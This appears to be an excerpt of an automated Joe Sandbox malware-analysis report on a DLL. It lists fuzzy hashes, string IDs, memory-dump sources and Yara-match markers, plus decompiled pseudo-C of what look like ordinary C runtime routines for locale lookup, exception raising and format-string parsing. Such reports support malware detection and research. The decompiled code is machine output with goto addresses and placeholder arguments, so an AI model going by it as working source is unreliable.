                                                                      • Opcode Fuzzy Hash: 0eaf43e210efa56df5064777eb6f9afb9e184fdf3fbed814589e450bea22d2d7
                                                                      • Instruction Fuzzy Hash: 0E32F271500789CBDBACCF68C89A59E7BB1FF44354F604219FE429B2A0C7B6D985CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 6IS$Y'$g&k
                                                                      • API String ID: 0-1347275694
                                                                      • Opcode ID: 5972e9e9ca915041273c62e911c59448f4779c96982aba4ba3a57c08c14b6c06
                                                                      • Instruction ID: 3cee7f9ca8509598c22c6fca92ec4969d77103674a6a123cb0063fd8226863bb
                                                                      • Opcode Fuzzy Hash: 5972e9e9ca915041273c62e911c59448f4779c96982aba4ba3a57c08c14b6c06
                                                                      • Instruction Fuzzy Hash: AA12DE7560670DCBEB68CF28C69A5993BE1FF54308F104129FC6A8B6A1D374D929CB48
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: \z$0k$|1#B
                                                                      • API String ID: 0-2604729280
                                                                      • Opcode ID: 8404b4b38dded9abebae47dab0adc7fa90b3b0a32bd634e0e4c225ac41767b4a
                                                                      • Instruction ID: e39719f0d18667e7e101b469cdaa0776a709ccc01222dcd057ee09ee0fb4da63
                                                                      • Opcode Fuzzy Hash: 8404b4b38dded9abebae47dab0adc7fa90b3b0a32bd634e0e4c225ac41767b4a
                                                                      • Instruction Fuzzy Hash: A0812670D046088FDB68CFE8D89659DBBB1FF44304F14422DE846AB694D7B4A94ACF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: X$vn$zk
                                                                      • API String ID: 0-721357504
                                                                      • Opcode ID: 50b4caa98fdb08d8472cbcfe9057dc5859aff7734f74001ad36ab103d46c2b24
                                                                      • Instruction ID: b86d624004ed591d3fa97a6fb60bd2f95eff6cd76e3198bf4dee1bc2269d8dfc
                                                                      • Opcode Fuzzy Hash: 50b4caa98fdb08d8472cbcfe9057dc5859aff7734f74001ad36ab103d46c2b24
                                                                      • Instruction Fuzzy Hash: 1B4106709007098BDB48CF68D98A5DE7FF1FB18398F14422DE84AA6294D7789594CFC9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: '^$;j$_ugL
                                                                      • API String ID: 0-711956307
                                                                      • Opcode ID: a3dfb4ea163b488dac0c45a878ea3ce93fe05d0bf929e5ca77de4ba23b6ce8f8
                                                                      • Instruction ID: 744061789da054faa811ddb7906de8bea1c71551b4b375643adb4348b25ec0a3
                                                                      • Opcode Fuzzy Hash: a3dfb4ea163b488dac0c45a878ea3ce93fe05d0bf929e5ca77de4ba23b6ce8f8
                                                                      • Instruction Fuzzy Hash: 7141ADB05087C48FE388DFA8D58991AFBE2FB84344F11495CF8869B7A1D7B4D885CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: B~$w]$|?
                                                                      • API String ID: 0-247504964
                                                                      • Opcode ID: 9a9b894874b930322d8b56c759be84ee1933409801e22c3e19b3390b4dc3abec
                                                                      • Instruction ID: 7176d7253ee9aef4cbb68dbcf3c6339da3a4bd6c489c4bbb02718c6a81b038d7
                                                                      • Opcode Fuzzy Hash: 9a9b894874b930322d8b56c759be84ee1933409801e22c3e19b3390b4dc3abec
                                                                      • Instruction Fuzzy Hash: F7310630619741AFD398DF28D59A51BBAF1FBC8354F80692DF596C73A0D774D8018B42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Xd$toX^$o
                                                                      • API String ID: 0-2635763631
                                                                      • Opcode ID: cc9a8f5f35b0414d693a0a8f8e15fc44c02e30de63412d1481f65eb75a055ea8
                                                                      • Instruction ID: 6b2dd759259cddd7e4c269e8dbdeeb7f1442a59437ad5f7da93bec29656f06d3
                                                                      • Opcode Fuzzy Hash: cc9a8f5f35b0414d693a0a8f8e15fc44c02e30de63412d1481f65eb75a055ea8
                                                                      • Instruction Fuzzy Hash: AB31E9B090074E8BDF48CF64C8864DE7FB0FB28358F104619E955A6294D3B8D6A5CFD5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: F%$S7$W
                                                                      • API String ID: 0-504169931
                                                                      • Opcode ID: 1b4f5dc09e16ab55a128d36fb56911f245a9ad70eaff82c8802139e490506b0b
                                                                      • Instruction ID: 53aaa8d8551c3443281d3fe00937c7d863abb147ddd99fa81f261ce72a0f4723
                                                                      • Opcode Fuzzy Hash: 1b4f5dc09e16ab55a128d36fb56911f245a9ad70eaff82c8802139e490506b0b
                                                                      • Instruction Fuzzy Hash: 703193B450078E8FDF48DF68D84A5EE3BB4FB08348F404A19FC2697290D3B49664CB94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: =/$N$ir
                                                                      • API String ID: 0-3638043655
                                                                      • Opcode ID: f14377342b98c92f0ae74d6a14aef29101b788d7960e972439fc8636954e3bbc
                                                                      • Instruction ID: e07859de9050469bd77d243e9864f0c9f9477a71291c65f1165ba2b30ad3deed
                                                                      • Opcode Fuzzy Hash: f14377342b98c92f0ae74d6a14aef29101b788d7960e972439fc8636954e3bbc
                                                                      • Instruction Fuzzy Hash: D82159B4628380AFD3C8DF28C48991ABBF0FB99304F902A1DF89A86364D775D444CB46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 29%
                                                                      			E000000011800475F0(void* __edx, void* __eflags, void* __rax, long long __rbx, void* __rcx, long long __rsi, long long __rbp, void* __r8, long long _a8, long long _a16, long long _a24) {
                                                                      				void* _t11;
                                                                      				void* _t22;
                                                                      				void* _t33;
                                                                      
                                                                      				_t23 = __rbx;
                                                                      				_t22 = __rax;
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t11 = r9d;
                                                                      				_t33 = __rcx;
                                                                      				E00000001180046D38(7, __rbx, "GetLocaleInfoEx", __rsi, 0x80061900, "GetLocaleInfoEx");
                                                                      				if (_t22 == 0) goto 0x80047650;
                                                                      				r9d = _t11;
                                                                      				 *0x8005d350();
                                                                      				goto 0x8004766a;
                                                                      				E00000001180047A98(0, 0, _t22, _t23, _t33);
                                                                      				r9d = _t11;
                                                                      				return GetLocaleInfoW(??, ??, ??, ??);
                                                                      			}






                                                                      0x1800475f0
                                                                      0x1800475f0
                                                                      0x1800475f0
                                                                      0x1800475f5
                                                                      0x1800475fa
                                                                      0x180047604
                                                                      0x180047613
                                                                      0x180047629
                                                                      0x180047631
                                                                      0x18004763d
                                                                      0x180047648
                                                                      0x18004764e
                                                                      0x180047655
                                                                      0x18004765c
                                                                      0x18004767e

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: InfoLocale
                                                                      • String ID: GetLocaleInfoEx
                                                                      • API String ID: 2299586839-2904428671
                                                                      • Opcode ID: e22e5297c09e8ec518552be1e12a1eda3cf067da00bfbeb5cbe1fbd0104193af
                                                                      • Instruction ID: 6a5816b5ab4279ef34768ab48b3a2dc14a57c55b1a9ab1421480b240a053e650
                                                                      • Opcode Fuzzy Hash: e22e5297c09e8ec518552be1e12a1eda3cf067da00bfbeb5cbe1fbd0104193af
                                                                      • Instruction Fuzzy Hash: D501A230B00B8885E7858B56B8407CAA361A78CBC5F58842AFE5D13B66CE38C6498340
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionRaise_clrfp
                                                                      • String ID:
                                                                      • API String ID: 15204871-0
                                                                      • Opcode ID: d29c67289edb359be945bc1961ea775e490fe4b6ed4f826ee0bd904efa327dd1
                                                                      • Instruction ID: c97eed978cef30f730eb6731270c757ed79ce32c4f66f3fe1506e66c22d9e68d
                                                                      • Opcode Fuzzy Hash: d29c67289edb359be945bc1961ea775e490fe4b6ed4f826ee0bd904efa327dd1
                                                                      • Instruction Fuzzy Hash: 98B13F77604B888BEB5ACF29C88639C77A0F349B88F19C911EB59977A4CF36C556C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.488615007.000001942A671000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001942A671000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1942a671000_loaddll64.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M>g^$# n
                                                                      • API String ID: 0-3693442824
                                                                      • Opcode ID: ffad9460d949737607e181f809e65f38e2dc30a25c6dc9cf3a30a34d70330952
                                                                      • Instruction ID: 4ca751e87daf75cc31565c27a83dd72067343987ed400ddfb704a6fc61cea8f3
                                                                      • Opcode Fuzzy Hash: ffad9460d949737607e181f809e65f38e2dc30a25c6dc9cf3a30a34d70330952
                                                                      • Instruction Fuzzy Hash: BC023971D1070A8FDB68CFA8D49A9DEBFB0FF54344F104129E852AA294C7749596CFC2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 47%
                                                                      			E00000001180025AD4(signed int __esi, long long __rbx, void* __rcx, long long __rbp, long long _a16, long long _a24) {
                                                                      				long long _v48;
                                                                      				long long _v56;
                                                                      				void* __rsi;
                                                                      				long long _t20;
                                                                      				void* _t26;
                                                                      				void* _t27;
                                                                      				void* _t33;
                                                                      
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rbp;
                                                                      				_t20 =  *((intOrPtr*)(__rcx + 8));
                                                                      				if ( *((intOrPtr*)(__rcx + 0x460)) != 0) goto 0x80025b3f;
                                                                      				 *((char*)(_t20 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t20 + 0x2c)) = 0x16;
                                                                      				_v48 = _t20;
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				_v56 = __rbp;
                                                                      				E00000001180013858(_t20, __rcx,  *((intOrPtr*)(__rcx + 0x460)), _t26, _t27, __rbp, _t33);
                                                                      				return __esi | 0xffffffff;
                                                                      			}










                                                                      0x180025ad4
                                                                      0x180025ad9
                                                                      0x180025aea
                                                                      0x180025b00
                                                                      0x180025b02
                                                                      0x180025b06
                                                                      0x180025b0d
                                                                      0x180025b12
                                                                      0x180025b15
                                                                      0x180025b18
                                                                      0x180025b21
                                                                      0x180025b3e

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $*
                                                                      • API String ID: 0-3982473090
                                                                      • Opcode ID: bdf37aee36c1a9bcf9ecc1a78acc6ee459692d1c1bc41879e2308dc26553ea12
                                                                      • Instruction ID: 967d7dd4bfa80cecb71b6af775db42b1f34193cb45dd40682de0242cf1749a15
                                                                      • Opcode Fuzzy Hash: bdf37aee36c1a9bcf9ecc1a78acc6ee459692d1c1bc41879e2308dc26553ea12
                                                                      • Instruction Fuzzy Hash: E9C192721047888AEBEB8F3980543ED3BA5E30DB89F298115EEC947395DF31CA49C719
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 61%
                                                                      			E00000001180026618(signed int __esi, long long __rbx, void* __rcx, void* __rdx, long long __rbp, void* __r8, void* __r10, long long _a16, long long _a24) {
                                                                      				long long _v48;
                                                                      				long long _v56;
                                                                      				void* __rdi;
                                                                      				void* __rsi;
                                                                      				intOrPtr _t121;
                                                                      				signed int _t133;
                                                                      				intOrPtr _t136;
                                                                      				intOrPtr _t137;
                                                                      				void* _t146;
                                                                      				signed int _t151;
                                                                      				char _t158;
                                                                      				void* _t164;
                                                                      				signed int _t166;
                                                                      				signed int _t177;
                                                                      				void* _t200;
                                                                      				intOrPtr _t209;
                                                                      				intOrPtr* _t218;
                                                                      				intOrPtr* _t223;
                                                                      				intOrPtr _t225;
                                                                      				intOrPtr _t227;
                                                                      				void* _t230;
                                                                      				void* _t232;
                                                                      				intOrPtr _t242;
                                                                      				intOrPtr _t244;
                                                                      				void* _t250;
                                                                      				void* _t252;
                                                                      				long long _t253;
                                                                      				void* _t260;
                                                                      				void* _t261;
                                                                      				signed int* _t263;
                                                                      				signed int* _t264;
                                                                      
                                                                      				_t261 = __r10;
                                                                      				_t258 = __r8;
                                                                      				_t253 = __rbp;
                                                                      				_t247 = __rdx;
                                                                      				_t232 = __rcx;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rbp;
                                                                      				_t209 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_t166 = __esi | 0xffffffff;
                                                                      				_t230 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x460)) != __rbp) goto 0x80026653;
                                                                      				 *((char*)(_t209 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t209 + 0x2c)) = 0x16;
                                                                      				goto 0x800269ed;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x10)) != __rbp) goto 0x80026689;
                                                                      				 *((char*)(_t209 + 0x30)) = 1;
                                                                      				r9d = 0;
                                                                      				 *((intOrPtr*)(_t209 + 0x2c)) = 0x16;
                                                                      				r8d = 0;
                                                                      				_v48 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v56 = __rbp;
                                                                      				E00000001180013858( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, __rdx, _t252, __rbp, __r8);
                                                                      				goto 0x80026a0d;
                                                                      				 *((intOrPtr*)(_t230 + 0x470)) =  *((intOrPtr*)(_t230 + 0x470)) + 1;
                                                                      				_t121 =  *((intOrPtr*)(_t230 + 0x470));
                                                                      				if (_t121 == 3) goto 0x80026a0a;
                                                                      				if (_t121 != 2) goto 0x800266b7;
                                                                      				if ( *((intOrPtr*)(_t230 + 0x474)) == 1) goto 0x80026a0a;
                                                                      				_t264 = _t230 + 0x2c;
                                                                      				_t263 = _t230 + 0x30;
                                                                      				 *_t264 = 0;
                                                                      				 *_t263 = 0;
                                                                      				 *((long long*)(_t230 + 0x10)) =  *((intOrPtr*)(_t230 + 0x478));
                                                                      				 *((intOrPtr*)(_t230 + 0x474)) = 0;
                                                                      				 *(_t230 + 0xde0) = _t166;
                                                                      				 *(_t230 + 0xde4) = _t166;
                                                                      				 *((intOrPtr*)(_t230 + 0x48)) = 0;
                                                                      				 *(_t230 + 0x24) = bpl;
                                                                      				goto 0x80026989;
                                                                      				if ( *(_t230 + 0x20) < 0) goto 0x8002699d;
                                                                      				if (_t232 - 0x20 - 0x5a > 0) goto 0x80026710;
                                                                      				goto 0x80026713;
                                                                      				 *(_t230 + 0x24) =  *((intOrPtr*)("bad exception"));
                                                                      				if (E00000001180034394(_t230, _t230, _t247, _t250, _t252, _t261) == 0) goto 0x80026a06;
                                                                      				if ( *(_t230 + 0x24) - 8 >= 0) goto 0x800269da;
                                                                      				_t151 =  *(_t230 + 0x24) & 0x000000ff;
                                                                      				_t177 = _t151;
                                                                      				if (_t177 == 0) goto 0x80026893;
                                                                      				if (_t177 == 0) goto 0x8002687a;
                                                                      				if (_t177 == 0) goto 0x80026832;
                                                                      				if (_t177 == 0) goto 0x800267e2;
                                                                      				if (_t177 == 0) goto 0x800267da;
                                                                      				if (_t177 == 0) goto 0x8002679a;
                                                                      				if (_t177 == 0) goto 0x8002678d;
                                                                      				if (_t151 - 0xfffffffffffffffc != 1) goto 0x80026a06;
                                                                      				E0000000118002C51C(_t164, _t166, _t230, _t230, _t247, _t250, _t252, _t258, _t261);
                                                                      				goto 0x80026825;
                                                                      				E0000000118002A78C(_t230, _t247);
                                                                      				goto 0x80026825;
                                                                      				if ( *((char*)(_t230 + 0x39)) == 0x2a) goto 0x800267ad;
                                                                      				E000000011800252C0(_t230, _t230, _t263, _t252);
                                                                      				goto 0x80026825;
                                                                      				if (E00000001180033AC8(_t146, _t230, _t230, _t252, _t253, _t260) == 0) goto 0x80026a06;
                                                                      				if ( *((intOrPtr*)(_t230 + 0x470)) != 1) goto 0x800267d0;
                                                                      				if ( *((intOrPtr*)(_t230 + 0x474)) != 1) goto 0x80026985;
                                                                      				if ( *_t263 >= 0) goto 0x80026823;
                                                                      				 *_t263 = _t166;
                                                                      				goto 0x80026823;
                                                                      				 *_t263 = 0;
                                                                      				goto 0x80026985;
                                                                      				if ( *((char*)(_t230 + 0x39)) == 0x2a) goto 0x800267f0;
                                                                      				goto 0x800267a6;
                                                                      				if (E00000001180033420(_t146, _t230, _t230, _t252, _t253, _t260) == 0) goto 0x80026a06;
                                                                      				if ( *((intOrPtr*)(_t230 + 0x470)) != 1) goto 0x80026813;
                                                                      				if ( *((intOrPtr*)(_t230 + 0x474)) != 1) goto 0x80026985;
                                                                      				_t133 =  *_t264;
                                                                      				if (_t133 >= 0) goto 0x80026823;
                                                                      				 *(_t230 + 0x28) =  *(_t230 + 0x28) | 0x00000004;
                                                                      				 *_t264 =  ~_t133;
                                                                      				if (1 == 0) goto 0x80026a06;
                                                                      				goto 0x80026985;
                                                                      				_t136 =  *((intOrPtr*)(_t230 + 0x39));
                                                                      				if (_t136 == 0x20) goto 0x80026871;
                                                                      				if (_t136 == 0x23) goto 0x80026868;
                                                                      				if (_t136 == 0x2b) goto 0x8002685f;
                                                                      				if (_t136 == 0x2d) goto 0x80026856;
                                                                      				if (_t136 != 0x30) goto 0x80026985;
                                                                      				 *(_t230 + 0x28) =  *(_t230 + 0x28) | 0x00000008;
                                                                      				goto 0x80026985;
                                                                      				 *(_t230 + 0x28) =  *(_t230 + 0x28) | 0x00000004;
                                                                      				goto 0x80026985;
                                                                      				 *(_t230 + 0x28) =  *(_t230 + 0x28) | 0x00000001;
                                                                      				goto 0x80026985;
                                                                      				 *(_t230 + 0x28) =  *(_t230 + 0x28) | 0x00000020;
                                                                      				goto 0x80026985;
                                                                      				 *(_t230 + 0x28) =  *(_t230 + 0x28) | 0x00000002;
                                                                      				goto 0x80026985;
                                                                      				 *_t264 = 0;
                                                                      				 *(_t230 + 0x38) = bpl;
                                                                      				 *(_t230 + 0x28) = 0;
                                                                      				 *_t263 = _t166;
                                                                      				 *((intOrPtr*)(_t230 + 0x34)) = 0;
                                                                      				 *(_t230 + 0x4c) = bpl;
                                                                      				goto 0x80026985;
                                                                      				_t137 =  *((intOrPtr*)(_t230 + 0x470));
                                                                      				if (_t137 != 1) goto 0x800268ac;
                                                                      				if ( *((intOrPtr*)(_t230 + 0x474)) != 2) goto 0x800268bd;
                                                                      				goto 0x80026985;
                                                                      				if (_t137 != 2) goto 0x800268bd;
                                                                      				if ( *((intOrPtr*)(_t230 + 0x474)) == 0) goto 0x80026985;
                                                                      				 *(_t230 + 0x4c) = bpl;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t230 + 8)) + 0x28)) != bpl) goto 0x800268d3;
                                                                      				E000000011800338E0(0xffffffffffffffe0, _t230,  *((intOrPtr*)(_t230 + 8)), _t264, _t252);
                                                                      				_t200 = r8d - _t166;
                                                                      				if (_t200 < 0) goto 0x80026946;
                                                                      				if (_t200 == 0) goto 0x80026946;
                                                                      				_t242 =  *((intOrPtr*)(_t230 + 0x460));
                                                                      				if ( *((intOrPtr*)(_t242 + 0x10)) !=  *((intOrPtr*)(_t242 + 8))) goto 0x80026911;
                                                                      				if ( *((intOrPtr*)(_t242 + 0x18)) == bpl) goto 0x8002690c;
                                                                      				 *(_t230 + 0x20) =  *(_t230 + 0x20) + 1;
                                                                      				goto 0x8002692f;
                                                                      				 *(_t230 + 0x20) = _t166;
                                                                      				goto 0x8002692f;
                                                                      				 *(_t230 + 0x20) =  *(_t230 + 0x20) + 1;
                                                                      				 *((long long*)(_t242 + 0x10)) =  *((long long*)(_t242 + 0x10)) + 1;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t230 + 0x460)))))) = r8b;
                                                                      				 *((long long*)( *((intOrPtr*)(_t230 + 0x460)))) =  *((long long*)( *((intOrPtr*)(_t230 + 0x460)))) + 1;
                                                                      				_t218 =  *((intOrPtr*)(_t230 + 0x10));
                                                                      				r8b =  *_t218;
                                                                      				 *((long long*)(_t230 + 0x10)) = _t218 + 1;
                                                                      				 *((intOrPtr*)(_t230 + 0x39)) = r8b;
                                                                      				if (r8b == 0) goto 0x800269ae;
                                                                      				_t244 =  *((intOrPtr*)(_t230 + 0x460));
                                                                      				if ( *((intOrPtr*)(_t244 + 0x10)) !=  *((intOrPtr*)(_t244 + 8))) goto 0x80026967;
                                                                      				if ( *((intOrPtr*)(_t244 + 0x18)) == bpl) goto 0x80026962;
                                                                      				 *(_t230 + 0x20) =  *(_t230 + 0x20) + 1;
                                                                      				goto 0x80026985;
                                                                      				 *(_t230 + 0x20) = _t166;
                                                                      				goto 0x80026985;
                                                                      				 *(_t230 + 0x20) =  *(_t230 + 0x20) + 1;
                                                                      				 *((long long*)(_t244 + 0x10)) =  *((long long*)(_t244 + 0x10)) + 1;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t230 + 0x460)))))) = r8b;
                                                                      				 *((long long*)( *((intOrPtr*)(_t230 + 0x460)))) =  *((long long*)( *((intOrPtr*)(_t230 + 0x460)))) + 1;
                                                                      				_t223 =  *((intOrPtr*)(_t230 + 0x10));
                                                                      				_t158 =  *_t223;
                                                                      				 *((long long*)(_t230 + 0x10)) = _t223 + 1;
                                                                      				 *((char*)(_t230 + 0x39)) = _t158;
                                                                      				if (_t158 != 0) goto 0x800266ee;
                                                                      				if (E00000001180034978(_t230, _t264,  *((char*)(_t230 + 0x39)), _t261) == 0) goto 0x80026a06;
                                                                      				goto 0x80026690;
                                                                      				_t225 =  *((intOrPtr*)(_t230 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t225 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t225 + 0x2c)) = 0x16;
                                                                      				_v48 =  *((intOrPtr*)(_t230 + 8));
                                                                      				_v56 = _t253;
                                                                      				E00000001180013858( *((intOrPtr*)(_t230 + 8)), _t230, _t230, _t264, _t252, _t253,  *((char*)(_t230 + 0x39)));
                                                                      				_t227 =  *((intOrPtr*)(_t230 + 8));
                                                                      				 *((char*)(_t227 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t227 + 0x2c)) = 0x16;
                                                                      				_v48 =  *((intOrPtr*)(_t230 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				_v56 = _t253;
                                                                      				E00000001180013858( *((intOrPtr*)(_t230 + 8)), _t230, _t230, _t264, _t252, _t253,  *((char*)(_t230 + 0x39)));
                                                                      				goto 0x80026a0d;
                                                                      				return  *(_t230 + 0x20);
                                                                      			}


































                                                                      0x180026618
                                                                      0x180026618
                                                                      0x180026618
                                                                      0x180026618
                                                                      0x180026618
                                                                      0x180026618
                                                                      0x18002661d
                                                                      0x18002662e
                                                                      0x180026632
                                                                      0x180026637
                                                                      0x180026641
                                                                      0x180026643
                                                                      0x180026647
                                                                      0x18002664e
                                                                      0x180026657
                                                                      0x180026659
                                                                      0x18002665d
                                                                      0x180026660
                                                                      0x180026667
                                                                      0x180026670
                                                                      0x180026677
                                                                      0x18002667c
                                                                      0x180026684
                                                                      0x180026690
                                                                      0x180026696
                                                                      0x18002669f
                                                                      0x1800266a8
                                                                      0x1800266b1
                                                                      0x1800266be
                                                                      0x1800266c2
                                                                      0x1800266c6
                                                                      0x1800266c9
                                                                      0x1800266cc
                                                                      0x1800266d0
                                                                      0x1800266d6
                                                                      0x1800266dc
                                                                      0x1800266e2
                                                                      0x1800266e5
                                                                      0x1800266e9
                                                                      0x1800266f1
                                                                      0x1800266fc
                                                                      0x18002670e
                                                                      0x18002672b
                                                                      0x180026735
                                                                      0x18002673f
                                                                      0x180026745
                                                                      0x180026749
                                                                      0x18002674b
                                                                      0x180026754
                                                                      0x18002675d
                                                                      0x180026766
                                                                      0x18002676b
                                                                      0x180026770
                                                                      0x180026775
                                                                      0x18002677a
                                                                      0x180026783
                                                                      0x180026788
                                                                      0x180026790
                                                                      0x180026795
                                                                      0x1800267a1
                                                                      0x1800267a6
                                                                      0x1800267ab
                                                                      0x1800267b4
                                                                      0x1800267c1
                                                                      0x1800267ca
                                                                      0x1800267d3
                                                                      0x1800267d5
                                                                      0x1800267d8
                                                                      0x1800267da
                                                                      0x1800267dd
                                                                      0x1800267e9
                                                                      0x1800267ee
                                                                      0x1800267f7
